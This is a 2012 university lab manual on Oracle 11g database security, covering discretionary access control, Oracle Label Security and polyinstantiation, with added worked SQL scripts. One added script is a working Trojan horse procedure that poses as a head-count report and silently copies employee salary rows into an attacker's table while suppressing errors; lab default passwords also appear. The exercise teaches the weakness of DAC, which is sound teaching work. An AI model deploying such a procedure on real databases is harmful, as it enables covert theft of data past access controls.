Lab Manual
Access Control Hands-on Learning
May 21, 2012, NSF-SFS Summer Workshop at University of Tennessee at Chattanooga
Database Security Using Oracle 11g
University of Tennessee at Chattanooga, 2012

Table of Contents
Project #1 Installing Oracle 11g Database
Project #1 Solution: Installing Oracle 11g Database
Project #2 Implement Discretionary Access Control and Exploit its Vulnerabilities
Project #3 Implement Mandatory Access Control Using Oracle Label Security
Appendix: More tutorials on label security of Oracle

Project #1 Installing Oracle 11g Database

Task One: Install Oracle 11g Database. (40 points)
Oracle Database software downloads are available at:
http://www.oracle.com/technology/software/products/database/index.html
A tutorial on Oracle installation is available at:
http://www.oracle.com/webfolder/technetwork/tutorials/obe/db/11g/r2/2day_dba/index.html
A tutorial on installing Oracle Database 11g on Windows is available at:
http://st-curriculum.oracle.com/obe/db/11g/r2/2day_dba/install/install.htm
Oracle SQL Developer is a free graphical tool for database development. With SQL Developer you can browse database objects, run SQL statements and SQL scripts, and edit and debug PL/SQL. You can also run any number of the provided reports, and create and save your own. More info:
http://www.oracle.com/technology/products/database/sql_developer/files/what_is_sqldev.html

Tips:
a. To make the installation easier, you are recommended to create a virtual machine and install a clean Windows XP in it.
b. If Oracle is no longer reachable after you restart your computer, go to Control Panel > Administrative Tools > Services and check that the Oracle services are started, in particular OracleDBConsole<SID> (the Enterprise Manager console). Note: type "emctl start dbconsole" if you are using the pre-configured Linux VM from Oracle.

Task Two: Create a database with the database schema in Chapter4.zip. (30 points)

Task Three: Use SQL commands to manipulate the data, including the following (20 points):
a) count the number of unique departments,
b) query an order,
c) insert a payment method, and
d) delete a product.

Task Four: Submit a written report covering the above activities. Use screenshots to document your results. (10 points)

Tips: Alternatively, you can use the Pre-Built Developer VMs (for Oracle VM VirtualBox):
http://www.oracle.com/technetwork/community/developer-vm/index.html
Just assemble the downloaded files (if needed), import them into VirtualBox (available for free), and go.
Uninstalling the Oracle database is not trivial. Here are guides to uninstalling Oracle manually from Windows XP:
a. Uninstalling Oracle 10g Manually from Windows XP
   Removing All Oracle Database Components:
   a) Stopping Oracle Services
   b) Removing Components with Oracle Universal Installer
   c) Manually Removing the Remaining Oracle Database Components
More: http://docs.oracle.com/cd/E11857_01/install.111/e16847/deinstall_em_gui.htm

Project #1 Solution: Installing Oracle 11g Database

1. Double-click to open VMware Player.
2. Click File > Open a Virtual Machine.
3. Browse to the folder WindowsXP-sp3-oracle-label and select WindowsXP-sp3.vmx.
4. Click Open to open the virtual machine, then double-click WindowsXP-sp3.vmx.
5. Select "I copied it" and click OK.
6. Click Yes.
7. Open the web browser and enter the address https://127.0.0.1:1158/em.
8. Press Enter and click Yes to accept the certificate.
9. Enter system as the user name and oracle as the password,
10. then click Login.
11. Double-click sqldeveloper on the Desktop and browse the connection sfs.
12. Exercise several SQL statements:
a. Count the number of unique departments using
   SELECT COUNT(DISTINCT DEPARTMENT_NAME) FROM DEPARTMENTS;
   Click Run Statement or press Ctrl+Enter. There are 14 unique departments.
b. Query an order using
   SELECT * FROM ORDERS WHERE ORDER_ID = '539';
c. Insert a payment method using
   INSERT INTO PAYMENT_METHOD VALUES ('10', 'Mobile phone');
d. Delete a product (the rows that reference the product are removed first) using
   DELETE FROM PRODUCT_PRICES WHERE PRODUCT_ID = '1000';
   DELETE FROM PRODUCT_SUPPLIER WHERE PRODUCT_ID = '1000';
   DELETE FROM PRODUCT_INVENTORY WHERE PRODUCT_ID = '1000';
   SQL Developer does not auto-commit by default, so click Commit (or run COMMIT) after the insert and the deletes if the changes are to persist.

Project #2 Implement Discretionary Access Control and Exploit its Vulnerabilities

Preparation was done in Project #1:
• Create a database ORCL including the CUSTOMERS, EMPLOYEES, ORDERS, JOBS, SALES_COMMISSION, DEPARTMENTS, CATEGORIES, PRODUCT_INVENTORY, PROMOTIONS, PRODUCT_PRICES, SUPPLIERS, PRODUCT_SUPPLIER, PAYMENT_METHOD, SHIPMENT_METHOD, and EMPLOYEE_RANKS tables.
• Run queries:
  1. Display customer name, product name, purchase price and employee id.
  2. Display the number of orders placed by each customer.

Task One (50 points):
• Design your own security policies, or use Tables 1 to 3, to define profiles, users, and roles.
• Define profiles. (10 points)
• Define roles. (10 points)
• Associate users with roles and profiles.
(10 points)
• Test your DAC security policies:
  • whether Alice can select from table EMPLOYEES (5 points)
  • whether Alice can insert into table ORDERS (5 points)
  • whether Ford can update table CUSTOMERS (5 points)
  • whether David can select from table EMPLOYEES (5 points)
Tip: qualify the table with the name of the schema (owner) when you run a query. For example, Alice can run the following to select from the EMPLOYEES table owned by SYSTEM:
   select * from system.employees;

Task Two (40 points): A Trojan horse application can exploit the weakness of DAC policies: a user who holds access rights can be tricked into running a program that copies the data to a user who does not hold them. Write a Trojan horse application so that David can access data in table EMPLOYEES.
− Trojan horse application. (20 points)
− Demo of results. (20 points)

Task Three (10 points): A written report documenting your efforts.

Table 1. Profile configuration requirements

Profile               Resource limits                  Password limits
DBSEC_ADMIN_PROF      Session_per_user = 5             Password_life_time = 1 month
                      Connect_time = 8 hours           Password_grace_time = 7 days
                      Idle_time = 1 hour
DBSEC_DEVELOPER_PROF  Connect_time = 12 hours          Password_life_time = 1 month
                      Idle_time = 2 hours              Password_grace_time = 14 days
                      CPU_per_call = 1 minute
DBSEC_CLERK_PROF      Session_per_user = 1             Failed_login_attempts = 1
                      CPU_per_call = 5 seconds         Password_lock_time = 3 days
                      Connect_time = 8 hours           Password_grace_time = 14 days
                      Idle_time = 30 minutes
                      Logical_reads_per_call = 10KB

Table 2. User account configuration

User name   Roles                              Profile
Alice       Human_resources, Account_Manager   DBSEC_ADMIN_PROF
Bob         Customer_Service                   DBSEC_CLERK_PROF
Cathy       Sales, Customer_Service            DBSEC_CLERK_PROF
David       Account_Manager                    DBSEC_DEVELOPER_PROF
Edwards     Sales                              DBSEC_CLERK_PROF
Ford        Marketing                          DBSEC_CLERK_PROF

Table 3. Role and privilege matrix (√ = privilege granted, X = privilege denied, blank = not listed, i.e. not granted)

Role               Table       Select  Insert  Update  Delete
Human_resources    Employee    √       √       √       X
Customer_Service   Customers   √               √       X
                   Orders      √                       X
Account_Manager    Customers   √       √       √       X
                   Orders      √       √       √       X
Sales              Customers   √               √       X
                   Orders      √               √       X
Marketing          Customers   √                       X
                   Orders      √                       X

Project #3 Implement Mandatory Access Control Using Oracle Label Security

Prerequisites:
1. Install Oracle Database 11g with a database called ORCL.
2. Install Oracle Database 11g with Label Security; configure the database ORCL by adding Label Security.

Tasks:
1. Create users Scott and Laura with "temp" as the password for both.
2. Create a label security policy with two levels, S and C, where S > C. (10 points)
3. Set user authorizations so that Scott is cleared for S and Laura for C. (10 points)
4. Apply the policy to tables EMPLOYEE_RANKS and EMPLOYEES. (10 points)
5. Apply the policy to the data. Label Security labels rows, so: the rows of EMPLOYEE_RANKS (the RANK data) are labelled S, so that Laura cannot access them; the rows of EMPLOYEES (the SALARY data) are labelled S if DEPARTMENT_ID is greater than or equal to 60, and C otherwise. (20 points)
6. Test the implementation of the policy by connecting to the database with Scott's and Laura's accounts. (10 points)
7. Run your Trojan horse application as Scott to see whether Laura can copy data from the EMPLOYEE_RANKS table. Report your observation. (10 points)
8. Test invisible polyinstantiation by having Laura insert a row that duplicates existing S data in table EMPLOYEES. (10 points)
9. Test visible polyinstantiation by having Scott insert a row that duplicates existing C data in table EMPLOYEES. (10 points)
10. Submit a written report explaining how you accomplished the above tasks. (10 points)
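The following script is an added worked example for Project #2, Task One; it is not part of the lab manual or of any Oracle tutorial. It implements Tables 1 to 3 as Oracle profiles, roles and users and then runs the four required tests. The passwords are placeholders chosen here, the tables are assumed to be owned by SYSTEM (as the tip above implies), the column names CUSTOMER_ID and the tablespace are assumptions, and the profile values are converted to the units Oracle actually uses.

```sql
-- Added example for Project #2, Task One (not from the lab manual). Run as SYSTEM.
-- Assumptions: Chapter4 tables are owned by SYSTEM; passwords below are placeholders.

-- Resource limits in a profile are only enforced while RESOURCE_LIMIT is TRUE.
ALTER SYSTEM SET resource_limit = TRUE;

-- Table 1. Oracle units: CONNECT_TIME and IDLE_TIME in minutes, CPU_PER_CALL in
-- hundredths of a second, LOGICAL_READS_PER_CALL in database blocks (10KB is about
-- 2 blocks with the default 8KB block size, assumed here), PASSWORD_* in days.
CREATE PROFILE dbsec_admin_prof LIMIT
  SESSIONS_PER_USER 5  CONNECT_TIME 480  IDLE_TIME 60
  PASSWORD_LIFE_TIME 30  PASSWORD_GRACE_TIME 7;

CREATE PROFILE dbsec_developer_prof LIMIT
  CONNECT_TIME 720  IDLE_TIME 120  CPU_PER_CALL 6000
  PASSWORD_LIFE_TIME 30  PASSWORD_GRACE_TIME 14;

CREATE PROFILE dbsec_clerk_prof LIMIT
  SESSIONS_PER_USER 1  CPU_PER_CALL 500  CONNECT_TIME 480  IDLE_TIME 30
  LOGICAL_READS_PER_CALL 2
  FAILED_LOGIN_ATTEMPTS 1  PASSWORD_LOCK_TIME 3  PASSWORD_GRACE_TIME 14;

-- Table 3. Roles carry the object privileges; X and blank cells get no grant at all.
CREATE ROLE human_resources;
GRANT SELECT, INSERT, UPDATE ON system.employees TO human_resources;

CREATE ROLE customer_service;
GRANT SELECT, UPDATE ON system.customers TO customer_service;
GRANT SELECT ON system.orders TO customer_service;

CREATE ROLE account_manager;
GRANT SELECT, INSERT, UPDATE ON system.customers TO account_manager;
GRANT SELECT, INSERT, UPDATE ON system.orders TO account_manager;

CREATE ROLE sales;
GRANT SELECT, UPDATE ON system.customers TO sales;
GRANT SELECT, UPDATE ON system.orders TO sales;

CREATE ROLE marketing;
GRANT SELECT ON system.customers TO marketing;
GRANT SELECT ON system.orders TO marketing;

-- Table 2. Each user gets a profile, the right to log in, and the listed roles.
CREATE USER alice   IDENTIFIED BY Alice2012   PROFILE dbsec_admin_prof;
CREATE USER bob     IDENTIFIED BY Bob2012     PROFILE dbsec_clerk_prof;
CREATE USER cathy   IDENTIFIED BY Cathy2012   PROFILE dbsec_clerk_prof;
CREATE USER david   IDENTIFIED BY David2012   PROFILE dbsec_developer_prof;
CREATE USER edwards IDENTIFIED BY Edwards2012 PROFILE dbsec_clerk_prof;
CREATE USER ford    IDENTIFIED BY Ford2012    PROFILE dbsec_clerk_prof;
GRANT CREATE SESSION TO alice, bob, cathy, david, edwards, ford;
GRANT human_resources, account_manager TO alice;
GRANT customer_service TO bob;
GRANT sales, customer_service TO cathy;
GRANT account_manager TO david;
GRANT sales TO edwards;
GRANT marketing TO ford;

-- Task One tests (SQL*Plus). The privilege check happens when the statement is
-- parsed, so the WHERE 1 = 0 statements test the grant without touching any row.
-- CUSTOMER_ID is an assumed column name.
CONNECT alice/Alice2012
SELECT COUNT(*) FROM system.employees;                              -- Alice, SELECT on EMPLOYEES
INSERT INTO system.orders SELECT * FROM system.orders WHERE 1 = 0;  -- Alice, INSERT on ORDERS
CONNECT ford/Ford2012
UPDATE system.customers SET customer_id = customer_id WHERE 1 = 0;  -- Ford, UPDATE on CUSTOMERS
CONNECT david/David2012
SELECT COUNT(*) FROM system.employees;                              -- David, SELECT on EMPLOYEES
```

CONNECT is a SQL*Plus command; in SQL Developer open a separate connection for each user instead. Alice's two statements succeed because HUMAN_RESOURCES grants SELECT on EMPLOYEES and ACCOUNT_MANAGER grants INSERT on ORDERS. Ford's UPDATE is refused with ORA-01031 (insufficient privileges), since MARKETING only grants SELECT on CUSTOMERS. David's SELECT is refused with ORA-00942 (table or view does not exist): with no privilege at all on SYSTEM.EMPLOYEES, Oracle does not even confirm that the table exists, which is a useful property to point out in the report.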
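The following is an added example of the Trojan horse application asked for in Project #2, Task Two, and reused in Project #3, step 7; it is not part of the lab manual. It assumes the DAC setup of Project #2 (David holds only ACCOUNT_MANAGER and has no privilege on EMPLOYEES, Alice can read EMPLOYEES), that the tables are owned by SYSTEM, and the column names EMPLOYEE_ID, SALARY and DEPARTMENT_ID and the tablespace USERS, none of which the manual specifies. The procedure name and the "drop box" table are inventions of this example.

```sql
-- Added example for Project #2 Task Two / Project #3 step 7 (not from the lab manual).
-- Assumptions: SYSTEM owns EMPLOYEES; columns EMPLOYEE_ID, SALARY, DEPARTMENT_ID exist;
-- the USERS tablespace exists. Nothing below gives David any privilege on EMPLOYEES.

-- As SYSTEM: David only needs to be able to create a table and a procedure.
GRANT CREATE TABLE, CREATE PROCEDURE TO david;
ALTER USER david QUOTA 10M ON users;

-- As DAVID: the drop box. Anyone may insert into it; only David can read it.
CREATE TABLE harvested_employees (
  employee_id   NUMBER,
  salary        NUMBER,
  department_id NUMBER,
  taken_by      VARCHAR2(30) DEFAULT USER,     -- records which victim ran the Trojan
  taken_at      DATE         DEFAULT SYSDATE
);
GRANT INSERT ON harvested_employees TO PUBLIC;

-- The "application". AUTHID CURRENT_USER makes it run with the CALLER's privileges
-- (including privileges the caller holds through roles, which a definer's-rights
-- unit would ignore). Dynamic SQL defers name resolution to run time, so the unit
-- compiles even though David himself cannot see SYSTEM.EMPLOYEES.
CREATE OR REPLACE PROCEDURE dept_headcount
  AUTHID CURRENT_USER
AS
  PRAGMA AUTONOMOUS_TRANSACTION;   -- the theft commits on its own, whatever the caller does
  TYPE row_t  IS RECORD (department_id NUMBER, n NUMBER);
  TYPE rows_t IS TABLE OF row_t;
  v_rows rows_t;
BEGIN
  -- Advertised function: head count per department, printed for the caller.
  EXECUTE IMMEDIATE
    'SELECT department_id, COUNT(*) FROM system.employees
       GROUP BY department_id ORDER BY department_id'
    BULK COLLECT INTO v_rows;
  FOR i IN 1 .. v_rows.COUNT LOOP
    DBMS_OUTPUT.PUT_LINE('Dept ' || v_rows(i).department_id || ': ' || v_rows(i).n);
  END LOOP;
  -- Hidden payload: every row the caller is allowed to read is copied to David.
  BEGIN
    EXECUTE IMMEDIATE
      'INSERT INTO david.harvested_employees (employee_id, salary, department_id)
         SELECT employee_id, salary, department_id FROM system.employees';
    COMMIT;
  EXCEPTION
    WHEN OTHERS THEN ROLLBACK;     -- a caller without SELECT notices nothing unusual
  END;
END;
/
GRANT EXECUTE ON dept_headcount TO PUBLIC;

-- As ALICE (SELECT on EMPLOYEES through HUMAN_RESOURCES): run the useful-looking report.
SET SERVEROUTPUT ON
EXEC david.dept_headcount

-- As DAVID: read what Alice's privileges fetched for him.
SELECT taken_by, COUNT(*) FROM harvested_employees GROUP BY taken_by;
```

DAC cannot stop this because every statement in the procedure is authorized: Alice is allowed to read EMPLOYEES and allowed to insert into David's table, and DAC has no notion of where data is allowed to flow. For Project #3, step 7, Laura builds the same procedure against EMPLOYEE_RANKS and Scott runs it. What Laura then sees depends on her drop box: if the drop box is an ordinary unlabelled table, Label Security does not govern it and the S rows Scott can read land there in the clear; if the drop box is itself under the policy with LABEL_DEFAULT, the rows Scott inserts are stamped with his default row label S and stay invisible to Laura. That difference, flow control on labelled data versus none on unlabelled copies, is the observation the report should make.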
Appendix: More tutorials on label security of Oracle

Note: Use "Using Oracle Label Security" from the Oracle 10g database tutorials as guidance:
http://www.oracle.com/technology/obe/10gr2_db_single/security/ols/ols_otn.htm
The information about Oracle Label Security in that tutorial is as follows.
The test user hr (password hr) owns the table LOCATIONS after installation:
   connect hr/hr
   select * from locations;
What you need:
• one user who owns the LOCATIONS table and grants privileges to the created users: hr
• one user who creates the policy: LBACSYS
• one security policy: ACCESS_LOCATIONS
• one column, appended to table LOCATIONS, that holds the security labels: OLS_COLUMN
• one user who creates the security levels and labels: sec_admin
• one user who creates users and roles and binds them to security labels: hr_sec
Major steps:
1. Create the users (sec_admin, hr_sec, SKING, KPARTNER, and LDORAN).
2. Create a policy:
   a. lbacsys creates the policy ACCESS_LOCATIONS.
   b. lbacsys grants the policy's administrative role ACCESS_LOCATIONS_DBA, with execute on SA_COMPONENTS to sec_admin and execute on SA_USER_ADMIN to hr_sec, so that they can administer the policy.
   c. sec_admin creates the security levels and labels SENS, CONF, and PUB.
3. Set the user authorizations:
   a. hr_sec binds the labels to the users, defining their clearances.
   b. Give the owner hr FULL access to the table.
4. Apply the policy to the table. At this point only hr can read the data, because no row labels have been set yet.
5. hr adds the labels to the data.
6. Revoke access from the admin users (sec_admin, hr_sec) by revoking ACCESS_LOCATIONS_DBA.
7. Test the policy implementation by connecting to the database from the different user accounts.
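The following script is an added example that walks the major steps above for the policy required in Project #3 (tasks 2 to 6, 8 and 9) rather than for the tutorial's LOCATIONS table; it is not part of the lab manual or of the Oracle tutorial. The policy name EMP_POLICY, the label column EMP_LABEL, the assumption that SYSTEM owns EMPLOYEES and EMPLOYEE_RANKS, the column names EMPLOYEE_ID, SALARY and DEPARTMENT_ID, and the LBACSYS password are all assumptions of this example.

```sql
-- Added example for Project #3 (not from the lab manual). Assumed names: policy
-- EMP_POLICY, label column EMP_LABEL, tables owned by SYSTEM with columns
-- EMPLOYEE_ID, SALARY, DEPARTMENT_ID; LBACSYS password as set when OLS was configured.

-- As SYSTEM: accounts, plus the DAC grants that Label Security still requires
-- underneath (OLS filters rows; it does not replace object privileges).
-- If the demo account SCOTT already exists, use instead:
--   ALTER USER scott IDENTIFIED BY temp ACCOUNT UNLOCK;
CREATE USER scott IDENTIFIED BY temp;
CREATE USER laura IDENTIFIED BY temp;
GRANT CREATE SESSION TO scott, laura;
GRANT SELECT, INSERT ON system.employees      TO scott, laura;
GRANT SELECT, INSERT ON system.employee_ranks TO scott, laura;

-- As LBACSYS: create the policy. This also creates the role EMP_POLICY_DBA and
-- grants it to LBACSYS; reconnect as LBACSYS afterwards so the role is enabled.
BEGIN
  SA_SYSDBA.CREATE_POLICY(policy_name     => 'EMP_POLICY',
                          column_name     => 'EMP_LABEL',
                          default_options => 'READ_CONTROL,WRITE_CONTROL,LABEL_DEFAULT');
END;
/
CONNECT lbacsys/lbacsys
BEGIN
  -- Levels: the higher number dominates the lower one, which gives S > C.
  SA_COMPONENTS.CREATE_LEVEL('EMP_POLICY', 2000, 'S', 'Secret');
  SA_COMPONENTS.CREATE_LEVEL('EMP_POLICY', 1000, 'C', 'Confidential');
  -- Data labels built from the levels only (no compartments or groups).
  SA_LABEL_ADMIN.CREATE_LABEL('EMP_POLICY', 2000, 'S');
  SA_LABEL_ADMIN.CREATE_LABEL('EMP_POLICY', 1000, 'C');
  -- Clearances: giving only the maximum read label makes the write, default
  -- and row labels the same value, so Scott writes S rows and Laura writes C rows.
  SA_USER_ADMIN.SET_USER_LABELS('EMP_POLICY', 'SCOTT', 'S');
  SA_USER_ADMIN.SET_USER_LABELS('EMP_POLICY', 'LAURA', 'C');
  -- The owner bypasses the policy, so it can see and label the existing rows.
  SA_USER_ADMIN.SET_USER_PRIVS('EMP_POLICY', 'SYSTEM', 'FULL');
  -- Protect the tables: this appends the EMP_LABEL column to each of them.
  SA_POLICY_ADMIN.APPLY_TABLE_POLICY('EMP_POLICY', 'SYSTEM', 'EMPLOYEES');
  SA_POLICY_ADMIN.APPLY_TABLE_POLICY('EMP_POLICY', 'SYSTEM', 'EMPLOYEE_RANKS');
END;
/

-- As SYSTEM: label the rows. OLS labels whole rows, so "the SALARY is S" means
-- the employee's row is S. A row whose label stays NULL is visible to nobody
-- without FULL, so every row gets a label here.
UPDATE system.employee_ranks SET emp_label = CHAR_TO_LABEL('EMP_POLICY', 'S');
UPDATE system.employees
   SET emp_label = CHAR_TO_LABEL('EMP_POLICY',
                     CASE WHEN department_id >= 60 THEN 'S' ELSE 'C' END);
COMMIT;

-- Task 6: the same query returns a different row set per clearance.
CONNECT scott/temp
SELECT department_id, COUNT(*) FROM system.employees GROUP BY department_id;
SELECT COUNT(*) FROM system.employee_ranks;
CONNECT laura/temp
SELECT department_id, COUNT(*) FROM system.employees GROUP BY department_id;
SELECT COUNT(*) FROM system.employee_ranks;

-- Task 8 (invisible polyinstantiation): Laura inserts a row with the key of an S
-- row she cannot see; LABEL_DEFAULT stamps her row C. &s_employee_id is the
-- EMPLOYEE_ID of a department >= 60 row, typed in at the SQL*Plus prompt.
INSERT INTO system.employees (employee_id, salary, department_id)
  VALUES (&s_employee_id, 1, 60);

-- Task 9 (visible polyinstantiation): Scott inserts a row with the key of a C row
-- he can see; his row is stamped S.
CONNECT scott/temp
INSERT INTO system.employees (employee_id, salary, department_id)
  VALUES (&c_employee_id, 1, 10);
```

Scott sees every row of both tables because S dominates C; Laura sees only the C rows of EMPLOYEES and nothing in EMPLOYEE_RANKS. The two inserts at the end show the polyinstantiation problem in the report: if EMPLOYEE_ID alone is the primary key, both inserts fail with ORA-00001 (unique constraint violated), because constraints are checked against all rows, not only the rows the session may read. In Laura's case that error tells a C user that a hidden S row with that key exists, a covert channel; allowing the two rows to coexist requires making the label column part of the unique key, which is what polyinstantiation means. The EMPLOYEES table may have further NOT NULL columns not listed here, in which case the inserts need those values as well.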
Users, passwords and roles in the tutorial:

User                  Password           Role and actions
system (as sysdba)    oracle             Creates and alters users and grants the CREATE SESSION privilege. Creates the users sec_admin and hr_sec with password welcome1; grants connect to emp_role.
LBACSYS               lbacsys (default)  Default Oracle administrator for Oracle Label Security (OLS). After creating a policy it holds the role <policy_name>_DBA with ADMIN option, which allows it to grant execute on SA_COMPONENTS and execute on SA_USER_ADMIN to other users such as sec_admin and hr_sec.
sec_admin             welcome1           Creates the levels and labels.
hr_sec                welcome1           Maintains the user-related part of OLS: creates database roles and users, grants clearances to them and binds labels to the users:
                                            create role emp_role;
                                            create user SKING identified by welcome1;
                                            grant emp_role to SKING;
                                            create user KPARTNER identified by welcome1;
                                            grant emp_role to KPARTNER;
                                            create user LDORAN identified by welcome1;
                                            grant emp_role to LDORAN;
hr                    hr                 Owner of table LOCATIONS, who decides the sensitivity of the data and who gets access to which level of sensitivity. Grants select to emp_role and adds the labels to the data.
SKING                 welcome1           Labelled SENS by hr, the owner of table LOCATIONS.
KPARTNER              welcome1           Labelled CONF by hr, the owner of table LOCATIONS.
LDORAN                welcome1           Labelled PUB by hr, the owner of table LOCATIONS.

Table name   Owner
LOCATIONS    A table owned by hr.

Policy name        Creator and objective
ACCESS_LOCATIONS   Created by LBACSYS; controls access to the hr.LOCATIONS table.

Column name   Objective
OLS_COLUMN    Name of the hidden column appended to the hr.LOCATIONS table; holds the data label.
Classified users: SKING (SENS), KPARTNER (CONF), LDORAN (PUB)

Labelled table (city, country_id, label_to_char(OLS_COLUMN)):

City                 Country_id   Label
Venice               IT           PUB
Hiroshima            JP           PUB
Southlake            US           PUB
South San Francisco  US           PUB
South Brunswick      US           PUB
Seattle              US           PUB
Toronto              CA           PUB
Whitehorse           CA           PUB
Bombay               IN           PUB
Sydney               AU           PUB
London               UK           PUB
Stratford            UK           PUB
Sao Paulo            BR           PUB
Geneva               CH           PUB
Bern                 CH           PUB
Utrecht              NL           PUB
Mexico City          MX           PUB
Roma                 IT           CONF
Oxford               UK           CONF
Munich               DE           CONF
Tokyo                JP           SENS
Beijing              CN           SENS
Singapore            SG           SENS